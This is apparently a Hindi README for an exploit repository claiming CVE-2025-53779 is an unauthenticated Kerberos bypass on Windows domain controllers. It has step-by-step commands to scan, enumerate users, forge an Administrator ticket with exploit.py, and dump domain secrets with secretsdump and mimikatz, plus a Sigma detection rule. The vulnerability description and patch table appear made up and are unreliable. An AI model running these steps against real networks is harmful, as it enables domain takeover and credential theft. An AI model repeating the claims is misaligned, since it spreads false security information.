
Reproduction of cve-2025-53779-kerberos_bypass_reproduction
CVSS स्कोर: 9.8 (गंभीर)
स्थिति: जंगली में सक्रिय शोषण
प्रकटीकरण: माइक्रोसॉफ्ट अगस्त 2025 पैच मंगलवार (ज़ीरो-डे)
CVE-2025-53779 माइक्रोसॉफ्ट विंडोज केरबरोस प्रोटोकॉल कार्यान्वयन में एक गंभीर प्रमाणीकरण बायपास भेद्यता है। एक अप्रमाणित हमलावर किसी भी डोमेन उपयोगकर्ता (डोमेन प्रशासकों सहित) का प्रतिरूपण करने के लिए, बिना वैध क्रेडेंशियल्स या किसी क्रिप्टोग्राफिक सामग्री के, केरबरोस प्रमाणीकरण को पूरी तरह से बायपास करने के लिए इस दोष का शोषण कर सकता है।
माइक्रोसॉफ्ट ने इस भेद्यता को CVSS 9.8 (गंभीर) रेटिंग दी है, इसकी कम हमला जटिलता, कोई आवश्यक विशेषाधिकार नहीं, कोई उपयोगकर्ता इंटरैक्शन नहीं, और डोमेन से जुड़े सिस्टम के पूर्ण समझौता की संभावना के कारण।
यह भेद्यता विंडोज डोमेन नियंत्रकों पर केरबरोस कुंजी वितरण केंद्र (KDC) सेवा (kdsvc.dll) में मौजूद है। विशेष रूप से, विशेषाधिकार विशेषता प्रमाणपत्र (PAC) सत्यापन रूटीन में एक सत्यापन तर्क त्रुटि एक हमलावर को एक AS-REQ या TGS-REQ संदेश बनाने की अनुमति देती है जो मानक प्रमाणीकरण जांचों को बायपास करता है।
kdsvc.dllKDC pac-signature-data फ़ील्ड को ठीक से मान्य करने में विफल रहता है जब केरबरोस संदेश निकाय में विशिष्ट फ़्लैग सेट होते हैं। एक विशेष रूप से तैयार किए गए AS-REQ को एक हेरफेर किए गए PA-PAC-REQUEST पाडाटा प्रकार और एक जाली प्राधिकरण डेटा प्रविष्टि के साथ भेजकर, हमलावर KDC को किसी भी उपयोगकर्ता प्रिंसिपल नाम (UPN) के लिए टिकट-अनुदान टिकट (TGT) जारी करने के लिए छल करता है, बिना संबंधित दीर्घकालिक कुंजी की आवश्यकता के।
हमला पूर्व-प्रमाणीकरण को बायपास करता है (REQUIRES_PRE_AUTH फ़्लैग प्रभावी रूप से नजरअंदाज कर दिया जाता है) और PAC सत्यापन को पूरी तरह से छोड़ देता है, जिससे उत्पन्न टिकट में मनमानी समूह सदस्यताएँ शामिल हो सकती हैं (उदाहरण के लिए, डोमेन प्रशासक, एंटरप्राइज़ प्रशासक)।
अगस्त 2025 सुरक्षा अद्यतन से पहले विंडोज सर्वर के सभी समर्थित संस्करण प्रभावित हैं:
नोट: विंडोज क्लाइंट संस्करण (विंडोज 10, विंडोज 11) प्रभावित नहीं हैं क्योंकि वे KDC सेवा नहीं चलाते हैं।
impacket लाइब्रेरी स्थापित होexploit.py)pip install impacket pycryptodome
या प्रदान की गई requirements.txt का उपयोग करके:
pip install -r requirements.txt
केरबरोस सेवाओं की खोज के लिए Nmap का उपयोग करें:
nmap -sU -p 88 --script krb5-enum-users <target-ip>
या अंतर्निहित केरबरोस स्कैनिंग का उपयोग करें:
python exploit.py --scan <target-ip>
यदि आप डोमेन उपयोगकर्ताओं को नहीं जानते हैं, तो केरबरोस AS-REP रोस्टिंग या LDAP के माध्यम से उनकी गणना करें:
python exploit.py --enum <target-ip> <domain>
लक्ष्य उपयोगकर्ता के लिए एक जाली TGT उत्पन्न करें:
python exploit.py --dc-ip <dc-ip> --domain <domain> --target-user <username>
उदाहरण:
python exploit.py --dc-ip 192.168.1.10 --domain corp.local --target-user Administrator
शोषण एक Kirbi-स्वरूपित टिकट फ़ाइल आउटपुट करता है। सत्यापित करने के लिए Impacket टूल का उपयोग करें:
# Export the ticket
set KRB5CCNAME=ticket.kirbi
# Use the ticket to access a resource
python examples/secretsdump.py -k -no-pass <domain>/Administrator@<target>
एक बार वैध TGT प्राप्त होने पर, आप यह कर सकते हैं:
secretsdump.py -k -no-pass domain/Administrator@<dc>mimikatz "kerberos::ptt ticket.kirbi"संलग्न exploit.py निम्नलिखित हमले के प्रवाह को लागू करता है:
PA-PAC-REQUEST फ़ील्ड और हेरफेर किए गए प्राधिकरण डेटा के साथ एक संशोधित AS-REQ संदेश बनाता हैkdsvc.dll में संवेदनशील कोड पथ को ट्रिगर करते हैंAttacker Domain Controller (KDC)
| |
| AS-REQ (forged PA-PAC-REQUEST) |
| - cname: Administrator |
| - sname: krbtgt/DOMAIN |
| - padata: PA-PAC-REQUEST + |
| forged auth-data |
|------------------------------------->|
| |
| [Vulnerable Path] |
| 1. KDC receives AS-REQ |
| 2. Checks PA-PAC-REQUEST flag |
| 3. **Bypasses pre-auth check** |
| 4. Skips PAC verification |
| 5. Generates TGT with arbitrary |
| groups via auth-data |
| |
| AS-REP (forged TGT) |
| - Encrypted with krbtgt key |
| - Contains forged PAC |
|<-------------------------------------|
| |
| TGS-REQ (use forged TGT) |
| - Request service ticket |
| - For any service (CIFS, LDAP, |
| HTTP, HOST) |
|------------------------------------->|
| |
| TGS-REP (service ticket) |
| - Legitimate service ticket |
| - Attacker can now access |
| any resource |
|<-------------------------------------|
माइक्रोसॉफ्ट अगस्त 2025 पैच मंगलवार अपडेट लागू करें — यह प्राथमिक सुधार है। संबंधित KB के लिए ऊपर प्रभावित संस्करण तालिका देखें।
शोषण प्रयासों के लिए निगरानी करें:
नेटवर्क विभाजन:
अतिरिक्त लॉगिंग सक्षम करें:
NetworkProvider\Kerberos\Operational)सिग्मा नियम (बिना पूर्व-प्रमाणीकरण के AS-REQ):
title: CVE-2025-53779 Kerberos Authentication Bypass
logsource:
product: windows
service: security
detection:
selection:
EventID: 4768
PreAuthenticationType: 0 # No pre-authentication required
condition: selection
falsepositives:
- Users with "Do not require Kerberos preauthentication" set
यह रिपॉजिटरी केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान की गई है। जिन सिस्टमों के आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति नहीं है, उनके विरुद्ध CVE-2025-53779 का अनधिकृत शोषण अवैध है। इस जानकारी के किसी भी दुरुपयोग के लिए लेखक जिम्मेदार नहीं हैं।
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
| Windows Version | Affected | Fixed Update |
|---|
| Windows Server 2025 | ✅ हाँ | KB5044289 |
| Windows Server 2022 | ✅ हाँ | KB5044285 |
| Windows Server 2019 | ✅ हाँ | KB5044277 |
| Windows Server 2016 | ✅ हाँ | KB5044293 |
| Windows Server 2012 R2 | ✅ हाँ | KB5044297 |
| Windows Server 2012 | ✅ हाँ | KB5044291 |
| Windows Server 2008 R2 (ESU) | ✅ हाँ | KB5044301 |
| Windows Server 2008 (ESU) | ✅ हाँ | KB5044303 |